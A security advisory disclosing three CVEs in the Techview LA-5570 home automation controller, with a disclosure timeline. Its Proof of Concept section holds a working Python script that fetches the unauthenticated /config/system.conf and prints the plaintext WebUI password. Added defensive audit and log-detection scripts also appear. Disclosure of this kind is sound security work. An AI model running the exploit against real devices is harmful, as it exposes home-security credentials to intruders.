
CVE-2023-34723, CVE-2023-34724, CVE-2023-34725

Updated: Sep 8, 2023

Multiple Vulnerabilities found in Techview LA-5570 Wireless Gateway Home Automation Controller


Introduction


The Security Team at [exploitsecurity.io] uncovered multiple vulnerabilities in the Techview LA-5570 Wireless Home Automation Controller [Firmware Version 1.0.19_T53]. These vulnerabilities can be chained to gain full control of the affected device.


CVE-2023-34723

Vulnerability Type: Directory Indexing, allows a threat actor to list the contents of specific directories outside of the web root context.


CVE-2023-34724

Vulnerability Type: On-Chip Debug and Test Interface With Improper Access Control, allows a threat actor unrestricted access to the root filesystem using an exposed UART interface, without the need for authentication.


CVE-2023-34725

Vulnerability Type: Incorrect Access Control, allows a threat actor access to sensitive systems configuration files without proper authentication or authorisation.


Affected Product Overview


The Techview LA-5570 Wireless Home Automation Controller provides a fully wireless solution that enables a home user to secure, monitor and control home facilities locally or remotely via phone, tablet PC, laptop, keypad and keyfob.


Product: LA-5570 Wireless Home Automation Controller

Affected Firmware Version: 1.0.19_T53

Product Vendor Link: https://www.jaycar.com.au/wireless-gateway-home-automation-controller/p/LA5570



System Architecture

CVE-2023-34723


The Security Team at [exploitsecurity.io] discovered that the Techview LA-5570 was susceptible to directory indexing.


This attack allows a threat actor to list the contents of specific directories outside the web root context [/server/cgi-bin/]. Specifically, it was possible to list the contents of the /config/ and /var/tmp/ directories, which were found to contain sensitive system files. Both of these directories were exposed as symbolic links within the web root context [/server/cgi-bin/], and the directories they pointed to, although owned by the root user, were readable by the web user.
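To audit a device filesystem or extracted firmware for the symlink exposure described above, here is an added check (not from the advisory): it walks a web root, reports every symlink whose target resolves outside that root, and notes whether the target is world-readable. The directory layout it builds is a constructed stand-in for the device's /server/cgi-bin/ tree with its config and yy links.

```python
import os
import stat
import tempfile


def find_escaping_symlinks(web_root):
    """Return sorted [(relative link path, resolved target, world_readable)] for
    every symlink under web_root whose target resolves to a path outside it."""
    root = os.path.realpath(web_root)
    findings = []
    # followlinks=False (the default) lists symlinked dirs but never descends into them.
    for dirpath, dirnames, filenames in os.walk(web_root):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            if not os.path.islink(path):
                continue
            target = os.path.realpath(path)
            if target == root or target.startswith(root + os.sep):
                continue  # link stays inside the web root: benign
            # Would 'other' users (e.g. the web server's uid) be able to read the target?
            readable = bool(os.stat(target).st_mode & stat.S_IROTH)
            findings.append((os.path.relpath(path, web_root), target, readable))
    return sorted(findings)


def build_demo_tree():
    """Constructed layout mirroring the advisory: a web root holding symlinks
    'config' -> var/www and 'yy' -> var/tmp, plus one harmless in-root link."""
    base = tempfile.mkdtemp(prefix="la5570-audit-")
    web_root = os.path.join(base, "server", "cgi-bin")
    for sub in ("server/cgi-bin/static", "var/www", "var/tmp"):
        os.makedirs(os.path.join(base, sub))
    with open(os.path.join(base, "var", "www", "system.conf"), "w") as fh:
        fh.write("system_password=SAMPLE_VALUE\n")  # constructed placeholder, not real data
    os.symlink(os.path.join(base, "var", "www"), os.path.join(web_root, "config"))
    os.symlink(os.path.join(base, "var", "tmp"), os.path.join(web_root, "yy"))
    os.symlink("static", os.path.join(web_root, "assets"))  # resolves inside the web root
    return base, web_root


if __name__ == "__main__":
    _, demo_root = build_demo_tree()
    for rel, target, readable in find_escaping_symlinks(demo_root):
        print(f"{rel} -> {target} (world-readable: {readable})")
```

Run it against the real web root of an unpacked firmware image to get the same report for the device's own links.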



Symlink config -> /var/www


Contents of /config/

Symlink yy -> /var/tmp

Contents of /var/tmp/

CVE-2023-34724

The Security Team found that it was possible to gain unrestricted access to the root filesystem using an exposed UART interface, without the need for authentication.


Exposed UART

UART Console

CVE-2023-34725

The Security Team found that it was possible to access sensitive files based on improper access control. It was found that it was possible to gain access to the sensitive /config/system.conf configuration file without proper authorisation, which contained the plaintext WebUI login credentials.


/config/system.conf

Responsible Disclosure


The Security Team at [exploitsecurity.io] reached out to the vendor to ensure that a patch could be released prior to public disclosure. However, as of the time of this disclosure, no patch has been applied.


Proof of Concept


The proof of concept code capitalises on CVE-2023-34725 to extract the WebUI password from the affected device, without proper authentication or authorisation.


#!/usr/bin/env python3

import ipaddress
import os
import sys
from time import sleep

import requests
import urllib3
from colorama import Fore, Style, init

# Silence the self-signed certificate warning from urllib3 (verify=False below).
urllib3.disable_warnings(category=urllib3.exceptions.InsecureRequestWarning)
init()  # enables ANSI colour output on Windows consoles


def banner():
    # Clear the terminal, then print the tool banner.
    os.system('cls' if os.name == 'nt' else 'clear')
    print("[+]****************************************************[+]")
    print(" | Author      : The Security Team                      |")
    print(" | Company     : " + Fore.RED + "Exploit Security" + Style.RESET_ALL + "\t\t\t|")
    print(" | Description : TechVIEW LA-5570 Directory Traversal   |")
    print(" | Usage       : " + sys.argv[0] + " <target>              |")
    print("[+]****************************************************[+]")


def usage():
    print(f"Usage: {sys.argv[0]} <target>")


def main(target):
    # CVE-2023-34725: /config/system.conf is served without authentication.
    url = f"http://{target}/config/system.conf"
    try:
        r = requests.get(url, verify=False, timeout=3)
        print("[+] Retrieving credentials", flush=True, end='')
        for _ in range(3):
            sleep(1)
            print(" .", flush=True, end='')
        if "system_password" in r.text:
            # Print the line carrying the plaintext WebUI password rather than a fixed line index.
            for line in r.text.splitlines():
                if "system_password" in line:
                    print(f"\n{line}")
        else:
            print(Fore.RED + "[!] Target is not vulnerable !" + Style.RESET_ALL)
    except (TimeoutError, requests.exceptions.Timeout):
        print(Fore.RED + "[!] Timeout connecting to target !" + Style.RESET_ALL)
    except requests.exceptions.RequestException as e:
        print(Fore.RED + "[!] Request failed: " + str(e) + " !" + Style.RESET_ALL)
    except KeyboardInterrupt:
        return


if __name__ == '__main__':
    if len(sys.argv) > 1:
        target = sys.argv[1]
        banner()
        try:
            # Accept only a syntactically valid IPv4/IPv6 address as the target.
            ipaddress.ip_address(target)
            main(target)
        except ValueError as e:
            print(Fore.RED + "[!] " + str(e) + " !" + Style.RESET_ALL)
    else:
        usage()
        print(Fore.RED + "[+] Not enough arguments, please specify target !" + Style.RESET_ALL)


Exploit Script
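For defenders, an added detection example (not part of the advisory or its proof of concept): it parses access-log lines and flags successful requests for /config/system.conf (CVE-2023-34725) and listings of the /config/ and /yy/ directories (CVE-2023-34723), ignoring denied responses. The Common Log Format layout and the sample lines are assumptions constructed for the demo; the LA-5570's own log format is not given on the page.

```python
import re

# Assumed Common Log Format; adjust LOG_RE if the device's httpd logs differently.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
# Paths named in the advisory: the unauthenticated config file and the two
# symlinked directories whose listings were exposed.
SENSITIVE_FILE = re.compile(r'^/config/system\.conf(?:\?.*)?$')
LISTABLE_DIRS = re.compile(r'^/(?:config|yy)/?(?:\?.*)?$')


def classify(path, status):
    """Map a request to a rule name, or None. Only 2xx responses count: a 401/403
    on the same path shows the access control working, not a leak."""
    if not 200 <= status < 300:
        return None
    if SENSITIVE_FILE.match(path):
        return "CVE-2023-34725 unauthenticated system.conf read"
    if LISTABLE_DIRS.match(path):
        return "CVE-2023-34723 directory listing"
    return None


def detect(log_lines):
    """Return one alert dict per matching line; lines that do not parse are skipped."""
    alerts = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        rule = classify(m["path"], int(m["status"]))
        if rule:
            alerts.append({"ip": m["ip"], "ts": m["ts"], "path": m["path"], "rule": rule})
    return alerts


# Constructed sample lines using documentation-range addresses, not real device logs.
SAMPLE_LOG = [
    '192.0.2.10 - - [25/Aug/2023:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512',
    '192.0.2.10 - - [25/Aug/2023:10:00:05 +0000] "GET /config/ HTTP/1.1" 200 1043',
    '192.0.2.10 - - [25/Aug/2023:10:00:09 +0000] "GET /config/system.conf HTTP/1.1" 200 210',
    '198.51.100.7 - - [25/Aug/2023:11:12:00 +0000] "GET /config/system.conf HTTP/1.1" 401 0',
    '198.51.100.7 - - [25/Aug/2023:11:12:03 +0000] "GET /yy/ HTTP/1.1" 200 880',
]

if __name__ == "__main__":
    for a in detect(SAMPLE_LOG):
        print(f"{a['ts']} {a['ip']} {a['path']} -> {a['rule']}")
```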

Timeline

  1. 26/5 - Raised a support ticket

  2. 29/5 - Response from support requesting further information

  3. 29/5 - Responded to support detailing that findings had been made

  4. 29/5 - CVE request for placeholder from MITRE

  5. 30/5 - Follow-up email requesting update

  6. 1/6 - Follow-up email requesting update

  7. 2/6 - Response from support requesting findings overview

  8. 2/6 - Responded to support with findings overview

  9. 2/6 - Support escalated to advanced product team

  10. 23/6 - Placeholder CVE(s) assigned by MITRE

  11. 25/8 - Public disclosure


